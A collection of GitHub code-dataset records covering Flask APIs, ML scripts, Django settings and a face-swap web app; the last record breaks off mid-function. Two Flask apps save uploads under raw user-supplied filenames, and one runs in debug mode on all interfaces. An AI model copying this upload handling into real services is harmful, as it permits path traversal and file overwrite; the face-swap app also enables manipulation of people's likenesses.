\"\"\"Function that implements the post endpoint for sentiment analysis\n \"\"\"\n \n # Extract the API KEY from the headers use it to find username\n api_key = request.headers.get('Api-Key')\n user = user_key.get_key(api_key)\n\n \n if not user:\n return {'message': 'Invalid Api-Key provided (there is no user associated with the key)'}, 401\n \n # Extract Text submitted for analysis from request body\n payload = request.get_json()\n text_input = payload.get('text-input')\n \n # Analysing the text and Extract sentiment for saving to database\n query_analysis_object = TextEngine()\n analysis = query_analysis_object.analyze_text(text_input=text_input)\n sentiment_value = analysis['messages'][0]['sentiment']\n \n # create a new instance of TextQuery class to save the request to database\n query_object = TextQuery(api_key, text_input, sentiment_value)\n query_object.save_query()\n return analysis\n \n\nclass ImageAnalysisResource(Resource):\n \"\"\" This Class implements the ImageAnalysis URL resource \"\"\"\n \n @authenticate\n def post(self):\n \"\"\" Implements the post endpoint for image analysis \"\"\"\n \n # Check if the 'image' file was uploaded in the request\n if 'image' not in request.files:\n return {'message': 'No image file uploaded.', 'required':'image file'}, 400\n\n image_file = request.files['image']\n \n api_key = request.headers.get('Api-Key')\n user = user_key.get_key(api_key)\n\n if not user:\n username = 'default'\n else:\n username = api_key\n \n # Save the image to the specific user folder\n folder_path = os.path.join(os.getcwd(), 'images', username)\n file_path = os.path.join(folder_path, image_file.filename)\n os.makedirs(folder_path, exist_ok=True)\n image_file.save(file_path)\n \n \n # Analysing the image file\n analysis = ImageEngine().analyze_file(file_path)\n \n # Create an ImageQuery object for storage\n query_object = ImageQuery(file_path, username, analysis)\n query_object.save_to_pickle(api_key)\n \n return analysis","repo_name":"AtangfMokamogo/NullExplicit_API","sub_path":"models/url_resources.py","file_name":"url_resources.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27211898676","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 7 09:39:47 2017\n# Polynomial Regression\n@author: Atul\n\"\"\"\n\n# import\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nimport statsmodels.formula.api as sm\n\n\n# data processing\ndata = pd.read_csv('dataset/Position_Salaries.csv')\nX = data.iloc[:, 1:2].values\ny = data.iloc[:, 2].values\n\n\"\"\"\n# Encoding the State columns\n# this will encode the categorical value to numerical as 0,1,2....\nlb_X = LabelEncoder()\nX[:, 0] = lb_X.fit_transform(X[:, 0])\n# this will create binary like representation from categorical value\n# set 1 for true and 0 for false\nohe_X = OneHotEncoder(categorical_features=[0])\nX = ohe_X.fit_transform(X).toarray()\n\n\n# Avoiding the dummy variable trap\nX = X[:, 1:] # removing the first column\n\n# splitting the data\ntrain_X, test_X, train_y, test_y = train_test_split(X, y, test_size=0.2, random_state=0)\n\"\"\"\n\n#fitting the data\nclf = LinearRegression()\nclf.fit(X, y)\n\n# polynomial, degree = 2\npoly = 
PolynomialFeatures(degree=2)\nX_poly = poly.fit_transform(X)\n\nclf_poly = LinearRegression()\nclf_poly.fit(X_poly, y)\n\n\n# polynomial, degree = 4\npoly4 = PolynomialFeatures(degree=4)\nX_poly4 = poly4.fit_transform(X)\n\nclf_poly4 = LinearRegression()\nclf_poly4.fit(X_poly4, y)\n\n\n\n# visualizting the data (Linear Regressions)\nplt.scatter(X, y, c='blue')\nplt.plot(X, clf.predict(X), c='red')\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n\n# visualizting the data (Linear Regressions)\nplt.scatter(X, y, c='blue')\nplt.plot(X, clf_poly.predict(X_poly), c='red')\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n\n# visualizting the data (Linear Regressions)\n#X_grid = np.arange(min(X), max(X), 0.1)\nplt.scatter(X, y, c='blue')\nplt.plot(X, clf_poly4.predict(X_poly4), c='red')\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n# more smoother prediction\nX_grid = np.arange(min(X), max(X), 0.1)\nX_grid = X_grid.reshape(len(X_grid), 1)\nplt.scatter(X, y, c='blue')\nplt.plot(X_grid, clf_poly4.predict(poly4.fit_transform(X_grid)), c='green')\nplt.grid(True)\nplt.xlabel(\"Positions\")\nplt.ylabel(\"Salary\")\n\n\n\n","repo_name":"atulsingh0/MachineLearning","sub_path":"ML_A2Z/04_Polynomial_Regression.py","file_name":"04_Polynomial_Regression.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73041914064","text":"import os\nimport subprocess as sp\nimport sys\n\n# convenience method to fetch gpu indices via `nvidia-smi`\ndef get_gpus(args: dict) -> list[str]:\n proc = sp.Popen(['nvidia-smi', '--list-gpus'], stdout=sp.PIPE, stderr=sp.PIPE)\n out, err = proc.communicate()\n data = [line.decode() for line in out.splitlines(False)]\n gpus = [f\"{item[4:item.index(':')]}\" for item in data]\n if args.gpus and args.gpus != \"all\":\n gpus = [id for id in gpus if id in args.gpus]\n\n return gpus\n\n# this splits the work into subprocesses, one for each gpu\n# args must have a --batch flag, which is used to determine which gpu to use\n# args must have a --gpus flag, which is used to determine which gpus to use\n# it will run the calling script again, but with a --batch flag per gpu\ndef split_across_gpus(args, n_elements, run_fn, final_fn=None):\n if args.batch != None:\n print(\"Starting process on CUDA device: \" + os.environ['CUDA_VISIBLE_DEVICES'])\n\n [proc_idx, n_procs] = [int(s) for s in args.batch.split('/')]\n run_fn(proc_idx, n_procs)\n \n # No --batch flag means we are part of the main process\n else:\n\n # split into subprocesses, one for each gpu\n procs = []\n gpus = get_gpus(args)\n n_gpus = len(gpus)\n\n # In case there are less elements to process than the number of gpus available...\n if n_elements < n_gpus:\n gpus = gpus[0:n_elements]\n n_gpus = n_elements\n\n print(f\"Using {n_gpus} GPU(s). 
Processing...\")\n \n i = 0\n for gpu in gpus:\n env = os.environ.copy()\n env[\"CUDA_VISIBLE_DEVICES\"] = gpu\n \n # rerun this command, but with a batch arg\n cmd = sys.argv.copy()\n cmd.insert(0, 'python')\n cmd.extend([\"--batch\", f\"{i}/{n_gpus}\"])\n\n proc = sp.Popen(cmd, env=env, shell=True, stderr=sys.stderr, stdout=sys.stdout)\n procs.append(proc)\n\n i = i + 1\n \n for p in procs:\n p.wait()\n \n if final_fn:\n final_fn()\n","repo_name":"JamesPerlman/nerf_utils","sub_path":"nerf/multi_gpu.py","file_name":"multi_gpu.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"}
{"seq_id":"38408399513","text":"# PascalCase -------- every word starts with a capital letter\n# EmployeeName\n# camelCase ---------- first word lowercase, following words capitalized\n# isNumeric\n# isFloat\nclass Number:\n def sum(self):\n print( self.a+self.b)\n \nnum=Number()\nnum.a=12\nnum.b=13\ns=num.sum()\n","repo_name":"itsmesangram5/Python_Tutorials","sub_path":"CodeWithHarry__PYTHON/26Oops.py","file_name":"26Oops.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"20617207569","text":"import os\nimport subprocess\n\ncwd = os.getcwd()\nbuildPath = cwd + \"/build_GL\"\n\nexist = os.path.isdir(buildPath)\n\nif not exist:\n os.mkdir(buildPath)\n\nos.chdir(buildPath)\n\n#for some reason, CMake cannot find glfw3 header file. Maybe I can use SDL2......\nsubprocess.call(\"cmake -DCMAKE_TOOLCHAIN_FILE=E:/vcpkg/scripts/buildsystems/vcpkg.cmake -DFORCEGL=ON ..\")","repo_name":"Visin1991/VEngine","sub_path":"Build_GL.py","file_name":"Build_GL.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32366468525","text":"\"\"\"ECI (Editio Chronica Incredibilis, or Publisher of Incredible Chronicles) is very traditional when it comes\nto numbering the pages of its books: it always uses Roman numerals for that. Its books never exceed\n999 pages because, when necessary, the book is split into volumes.\n\nYou must write a program that, given an Arabic number, prints its equivalent in Roman numerals.\n\nRemember that I represents 1, V is 5, X is 10, L is 50, C is 100, D is 500 and M represents 1000.\n\nInput\nThe input is a positive integer N (0 < N < 1000).\n\nOutput\nThe output is the number N written in Roman numerals on a single line. Always use uppercase letters.\"\"\"\nN = int(input())\nM = N // 1000\nN = N % 1000\nF = str()\nif M == 1:\n F += 'M'\nM = N // 100\nN = N % 100\nif M == 9:\n F += 'CM'\nelif M >= 5:\n F += 'D'\n for c in range(5,M):\n F += 'C'\nelif M == 4:\n F += 'CD'\nelif M < 4:\n for c in range(M):\n F += 'C'\nM = N // 10\nN = N % 10\nif M == 9:\n F += 'XC'\nelif M >= 5:\n F += 'L'\n for c in range(5,M):\n F += 'X'\nelif M == 4:\n F += 'XL'\nelif M < 4:\n for c in range(M):\n F += 'X'\nif N == 9:\n F += 'IX'\nelif N >= 5:\n F += 'V'\n for c in range(5,N):\n F += 'I'\nelif N == 4:\n F += 'IV'\nelif N < 4:\n for c in range(N):\n F += 'I'\nprint(F)\n\n","repo_name":"marcelopd20/PythonStudies","sub_path":"PlataformasDeCódigo/URI/1960 - Numeração Romana para Números de Página.py","file_name":"1960 - Numeração Romana para Números de Página.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"6805526314","text":"\"\"\" Laura Day - Milestone Project 4.\n\nThis project was mainly made with guidance from\nBoutique Ado Project\n\n(c) Josefine Kihlström 2021\n\"\"\"\nimport os\nimport dj_database_url\nfrom pathlib import Path\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', '')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = ['lauraday-josefinekihlstrom.herokuapp.com', 'localhost']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount', # social media login. 
Keep?\n 'home',\n 'products',\n 'bag',\n 'checkout',\n 'crispy_forms',\n 'profiles',\n 'storages',\n 'blog',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n]\n\nROOT_URLCONF = 'lauraday.urls'\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n os.path.join(BASE_DIR, 'templates', 'allauth'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n # above is required by allauth\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.media',\n 'bag.contexts.bag_contents',\n ],\n 'builtins': [\n 'crispy_forms.templatetags.crispy_forms_tags',\n 'crispy_forms.templatetags.crispy_forms_field',\n ]\n },\n },\n]\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\n\n# following code is from django allauth installation\n# https://django-allauth.readthedocs.io/en/latest/installation.html\nAUTHENTICATION_BACKENDS = [\n # Handles superuser/admin login.\n 'django.contrib.auth.backends.ModelBackend',\n\n # Allows user to login with email address.\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\nSITE_ID = 1\n\n\n# Allow authentication by username or email.\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\n# Email required to register.\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_SIGNUP_EMAIL_ENTER_TWICE = True\nACCOUNT_USERNAME_MIN_LENGTH = 4\n# Specified login url.\nLOGIN_URL = '/accounts/login/'\n# Redirecting back after logging in.\nLOGIN_REDIRECT_URL = '/'\n\nWSGI_APPLICATION = 'lauraday.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nif 'DATABASE_URL' in os.environ:\n DATABASES = {\n 'default': dj_database_url.parse(os.environ.get('DATABASE_URL'))\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n }\n\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images) \n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nif 
'USE_AWS' in os.environ:\n # Cache control\n AWS_S3_OBJECT_PARAMETERS = {\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'CacheControl': 'max-age=94608000',\n }\n\n # Bucket configuration\n AWS_STORAGE_BUCKET_NAME = 'lauraday-josefinekihlstrom'\n AWS_S3_REGION_NAME = 'eu-north-1'\n AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\n AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n AWS_S3_CUSTOM_DOMAIN = f'{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com'\n\n # Static and media files\n STATICFILES_STORAGE = 'custom_storages.StaticStorage'\n STATICFILES_LOCATION = 'static'\n DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n MEDIAFILES_LOCATION = 'media'\n\n # Override static and media URLs in production\n STATIC_URL = 'https://%s/%s/' % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)\n MEDIA_URL = 'https://%s/%s/' % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)\n\n\n# Stripe\nFREE_DELIVERY_THRESHOLD = 50\nSTANDARD_DELIVERY_PERCENTAGE = 10\nSTRIPE_CURRENCY = 'usd'\nSTRIPE_PUBLIC_KEY = os.getenv('STRIPE_PUBLIC_KEY', '')\nSTRIPE_SECRET_KEY = os.getenv('STRIPE_SECRET_KEY', '')\nSTRIPE_WH_SECRET = os.getenv('STRIPE_WH_SECRET', '')\nif 'DEVELOPMENT' in os.environ:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n DEFAULT_FROM_EMAIL = 'info@lauraday.com'\nelse:\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_USE_TLS = True\n EMAIL_PORT = 587\n EMAIL_HOST = 'smtp.gmail.com'\n EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')\n EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASS')\n DEFAULT_FROM_EMAIL = os.environ.get('EMAIL_HOST_USER')\n","repo_name":"Josefinekihlstrom/LauraDay","sub_path":"lauraday/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26401821237","text":"import numpy as np\nimport pylab\nfrom Bio import SeqIO\nfrom bidi.algorithm import get_display\nfrom arabic_reshaper import reshape\n\n\ndef en_to_fa(num, formatter='%1.1f%%'):\n num_as_string = formatter % num\n mapping = dict(list(zip('0123456789.%', '۰۱۲۳۴۵۶۷۸۹%')))\n return ''.join(mapping[digit] for digit in num_as_string)\n\n\ndef draw_line_plot(fasta_input_file, plot_title, plot_out_file, x_text, y_text):\n len_of_records = [len(rec.seq) for rec in SeqIO.parse(fasta_input_file, \"fasta\")]\n length, count = np.unique(len_of_records, return_counts=True)\n max_len = max(length)\n min_len = min(length)\n print(length)\n print(count)\n print(\"max_len: \" + str(max_len))\n print(\"min_len: \" + str(min_len))\n font = {\"family\": \"Sahel\", \"size\": 12}\n\n pylab.xlabel(get_display(reshape('طول توالی پپتیدها')))\n pylab.ylabel(get_display(reshape('تعداد پپتیدها')))\n pylab.title(plot_title)\n pylab.text(x_text, y_text,\n get_display(reshape('=ماکزیمم طول ')) + str(max_len) + get_display(reshape('\\n=مینیمم طول ')) +\n str(min_len) + get_display(reshape('\\n=تعداد کل توالی ها'))\n + str(sum(count)))\n pylab.grid()\n pylab.plot(length, count)\n pylab.savefig(plot_out_file)\n\n pylab.cla()\n pylab.clf()\n\n\ndef draw_all_plots():\n title_pos = 'نمودار طول توالی پپتیدهای ضدسرطانی پس از اعمال cd-hit 80%'\n title_neg = 'نمودار طول توالی پپتیدهای غیرضدسرطانی پس از اعمال cd-hit 80%'\n draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_80_pos.fasta',\n get_display(reshape(title_pos)),\n 'ACP_80_pos_farsi', 150, 30)\n 
draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_80_neg.fasta',\n get_display(reshape(title_neg)),\n 'ACP_80_neg_farsi', 60, 120)\n # # -----------------------------\n # title_pos = 'نمودار طول توالی پپتیدهای ضدسرطانی پس از اعمال cd-hit 90%'\n # title_neg = 'نمودار طول توالی پپتیدهای غیرضدسرطانی پس از اعمال cd-hit 90%'\n # draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_90_pos.fasta',\n # get_display(reshape(title_pos)),\n # 'ACP_90_pos_farsi', 150, 35)\n # draw_line_plot('../../../data/split_data/round3/raw_data_after_split_pos_and_neg/ACP_90_neg.fasta',\n # get_display(reshape(title_neg)),\n # 'ACP_90_neg_farsi', 70, 120)\n # -----------------------------\n # title_pos = 'نمودار طول توالی پپتیدهای ضدسرطانی ��دون اعمال cd-hit'\n # title_neg = 'نمودار طول توالی پپتیدهای غیرضدسرطانی بدون اعمال cd-hit'\n #\n # draw_line_plot('../../../data/ACP_dataset/fasta/ACP_mixed_all_pos.fasta',\n # get_display(reshape(title_pos)),\n # 'Original_ACP_pos_farsi', 150, 65)\n #\n # draw_line_plot('../../../data/ACP_dataset/fasta/ACP_mixed_all_neg.fasta',\n # get_display(reshape(title_neg)),\n # 'Original_ACP_neg_farsi', 70, 150)\n # -----------------------------\n\n\ndraw_all_plots()\n\nprint(\"DONE!\")\n","repo_name":"mtzynb/MyThesis","sub_path":"plots/round3/plots_raw_data/plot_data_farsi.py","file_name":"plot_data_farsi.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27165700616","text":"import glob\nfrom pathlib import Path\nfrom time import sleep\n\nimage_list = glob.glob(\"image/*.png\")\n\ntext = \"\"\ntext = text + \"\\n\" + \" \"\nfor i in image_list:\n text = text + \"\\n\" + f\" image/{Path(i).name}\"\ntext = text + \"\\n\" + \" \"\ntext = text + \"\\n\" + \"\"\n\nfile_path = \"resource.qrc\"\nwith open(file_path, 'w', encoding=\"utf-8\") as file:\n file.write(text)\n\nprint(\"OK\")\nsleep(1)","repo_name":"MKdays/__resource__","sub_path":"image_to_qrc.py","file_name":"image_to_qrc.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24652968779","text":"import os\n\nimport cv2\nimport insightface\nfrom PIL import Image\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory\nfrom insightface.app import FaceAnalysis\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory('uploads', filename)\n\n\n@app.route('/faces/')\ndef uploaded_faces(filename):\n return send_from_directory('faces', filename)\n\n\n@app.route('/face_detect_and_select', methods=['GET', 'POST'])\ndef display_faces():\n clear_folder('faces')\n clear_folder('uploads')\n if 'source' not in request.files:\n return \"No image part in the form\"\n\n source = request.files['source']\n if source.filename == '':\n return \"No selected image\"\n\n source.save('uploads/' + source.filename)\n\n faces = detect_faces('uploads/' + source.filename)\n filenames = []\n for i, face in enumerate(faces):\n cropped_image = (Image.open('uploads/' + source.filename)).crop(face['bbox'])\n filename = 'faces/face' + str(i + 1) + '.jpg'\n filenames.append('face' + str(i + 1) + '.jpg')\n cropped_image.save(filename)\n print(filenames)\n # result_image = swap_faces(detect_faces('uploads/' + target.filename), source_face, 
'uploads/' + target.filename)\n # cv2.imwrite('uploads/result.jpg', result_image)\n return render_template('face_detect_and_select.html', filenames=filenames)\n\n\n@app.route('/target_face_upload_and_swap', methods=['GET', 'POST'])\ndef target_face_upload_and_swap():\n face_number = -1\n if request.method == 'POST':\n selected_value = request.form.get('selected_file') # Get the selected dropdown value\n face_number = int(selected_value[-1]) - 1\n print(face_number)\n # Use the selected_value as needed\n if 'target' not in request.files:\n return \"No image part in the form\"\n print(os.listdir('uploads')[0])\n#source = Image.open('uploads/' + os.listdir('uploads')[0])\n source_face = detect_faces('uploads/' + os.listdir('uploads')[0])[face_number]\n target = request.files['target']\n if target.filename == '':\n return \"No selected image\"\n\n target.save('uploads/' + target.filename)\n\n result_image = swap_faces(detect_faces('uploads/' + target.filename), source_face, 'uploads/' + target.filename)\n cv2.imwrite('uploads/result.jpg', result_image)\n return render_template('result_image.html', target_path=target.filename,\n image_filename='result.jpg')\n\n\ndef detect_faces(image_path):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n fapp = FaceAnalysis(name='buffalo_l')\n fapp.prepare(ctx_id=0, det_size=(640, 640))\n faces = fapp.get(image)\n return faces\n\n\ndef swap_faces(faces, source_face, image_path):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n swapper = insightface.model_zoo.get_model('inswapper_128.onnx', download=True, download_zip=False)\n faces = sorted(faces, key=lambda x: x.bbox[0])\n res = image.copy()\n for face in faces:\n res = swapper.get(res, face, source_face, paste_back=True)\n return res\n\n\ndef clear_folder(folder_path):\n try:\n # List all files in the folder\n file_list = os.listdir(folder_path)\n\n # Loop through the files and delete each one\n for file_name in file_list:\n file_path = os.path.join(folder_path, file_name)\n if os.path.isfile(file_path):\n os.remove(file_path)\n\n return True # Successfully cleared all images\n except Exception as e:\n return False # An error occurred\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","repo_name":"koni4045/faceswapRepo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6596101741","text":"import re, json\r\nfrom seg_utils import Tokenizer\r\nfrom tqdm import tqdm\r\nfrom qw import query_weight\r\nfrom utils import cal_ndcg\r\nfrom collections import Counter\r\nfrom data_utils import preprocess_text\r\n\r\ndef gen_true_data(source_path, out_path):\r\n t = Tokenizer()\r\n res = []\r\n total_num = len(open(source_path, encoding=\"utf8\").readlines())\r\n with open(source_path, encoding=\"utf8\") as fin:\r\n for line in tqdm(fin, total=total_num):\r\n query = line.strip().split(\"\\t\")[0]\r\n senten2term, _ = t.tokenize(query)\r\n if len(senten2term) < 2: continue\r\n res.append(\"\\t\".join(senten2term) + \"\\n\")\r\n with open(out_path, \"w\", encoding=\"utf8\") as fin:\r\n fin.write(\"\".join(res))\r\n\r\ndef test():\r\n qw = query_weight()\r\n pred_num, total_num = 0, 0\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/querytrue.txt\", encoding=\"utf8\").readlines()[1:159]]\r\n for (i, (query, label)) in enumerate(text):\r\n #query = \"移动医疗\"\r\n res = qw.run_step(query)\r\n pred = sorted(res, key=lambda d: 
d[1], reverse=True)[0]\r\n if pred[0] == label.split()[0]: pred_num += 1\r\n else: print(str(i+1) + \"\\t\" + query + \"\\t\" +\" \".join([k+\":\"+str(v) for k, v in res]) + \"\\t\" + pred[0] + \"_\" + label.split()[0])\r\n #if set([k for k, v in res]).difference(set(label.split())): print(str(i+1), '\\t', \" \".join([k for k, v in res]), '\\t', label)\r\n total_num += 1\r\n print(\"acc: %f\" % (round(pred_num / total_num, 3)))\r\n a=1\r\n\r\ndef cal_feedback_ndcg(file_name=\"get_jdcv_data/feedback.res\"):\r\n query_label, query_ndcg, dcg_sum, ndcg_sum = {}, {}, 0.0, 0.0\r\n text = [e.strip().split(\"\\t\") for e in open(file_name, encoding=\"utf8\").readlines()]\r\n for i in range(len(text)):\r\n ele = text[i]\r\n if i == 0: field2id = {e: i for i, e in enumerate(ele)}\r\n else:\r\n keyword, is_correct = ele[field2id['keyword']], ele[field2id['is_correct']]\r\n if keyword not in query_label: query_label[keyword] = []\r\n query_label[keyword].append(is_correct)\r\n for query, label in query_label.items():\r\n label_freq = sorted(Counter(label).items(), key=lambda d: d[1], reverse=True)\r\n if len(label_freq) == 1 or (len(label_freq) == 2 and label_freq[1][1] < 3):\r\n pass; #print(query, '\\t', label); #continue\r\n dcg, idcg, ndcg = cal_ndcg(label, 20)\r\n query_ndcg[query] = [round(dcg, 3), round(idcg, 3), round(ndcg, 3)]\r\n dcg_sum += dcg; ndcg_sum += ndcg\r\n sorted_query_ndcg = sorted(query_ndcg.items(), key=lambda d: d[1][2]); #print(json.dumps(query_ndcg, ensure_ascii=False))\r\n dcg_avg, ndcg_avg = dcg_sum / len(query_ndcg), ndcg_sum / len(query_ndcg)\r\n print(\"file_name: %s\\ttotal query: %d\\tvalid query: %d\\tdcg_avg: %.3f\\tndcg_avg: %.3f\" % (file_name, len(query_label), len(query_ndcg), dcg_avg, ndcg_avg))\r\n return dcg_avg, ndcg_avg, query_ndcg\r\n\r\ndef cal_ndcg_train_data(topk=1):\r\n ndcg_sum = 0.0\r\n matchObj = re.compile(r'(.+)\\t([0-9]+)', re.M | re.I) ; qw = query_weight()\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/label.data\", encoding=\"utf8\").readlines() if e.strip()]\r\n for line in tqdm(text, total=len(text)):\r\n seg_line = [(preprocess_text(e.split(\":\")[0]), e.split(\":\")[1]) for e in line]\r\n sorted_seg_line = sorted(seg_line, key=lambda d: d[1], reverse=True)\r\n rel = {k: len(sorted_seg_line)-i-1 for i, (k, v) in enumerate(sorted_seg_line)}\r\n query = \" \".join([e[0] for e in seg_line])\r\n dcg, idcg, ndcg = get_one_query_ndcg(qw, query, rel, topk)\r\n ndcg_sum += ndcg\r\n ndcg_avg = ndcg_sum / len(text)\r\n print(\"ndcg_avg@%d: %.3f\" % (topk, ndcg_avg))\r\n\r\ndef cal_ndcg_manual_data(topk=1):\r\n qw = query_weight(); ndcg_sum = 0.0\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/querytrue.txt\", encoding=\"utf8\").readlines()[1:159] if e.strip()]\r\n for (query, label) in tqdm(text, total=len(text)):\r\n seg_label = label.split()\r\n rel = {e: len(seg_label)-i-1 for i, e in enumerate(seg_label)}\r\n dcg, idcg, ndcg = get_one_query_ndcg(qw, query, rel, topk)\r\n ndcg_sum += ndcg\r\n ndcg_avg = ndcg_sum / len(text)\r\n print(\"ndcg_avg@%d: %.3f\" % (topk, ndcg_avg))\r\n\r\ndef get_one_query_ndcg(qw, query, rel, topk=1):\r\n res = qw.run_step(query)\r\n pred = sorted(res, key=lambda d: d[1], reverse=True)\r\n label_list = [rel.get(k, 0) for k, v in pred]\r\n dcg, idcg, ndcg = cal_ndcg(label_list, topk)\r\n return dcg, idcg, ndcg\r\n\r\ndef aa():\r\n res = {}\r\n dcg_avg_old, ndcg_avg_old, query_ndcg_old = cal_feedback_ndcg(\"get_jdcv_data/feedback2982.res\")\r\n dcg_avg_new, ndcg_avg_new, 
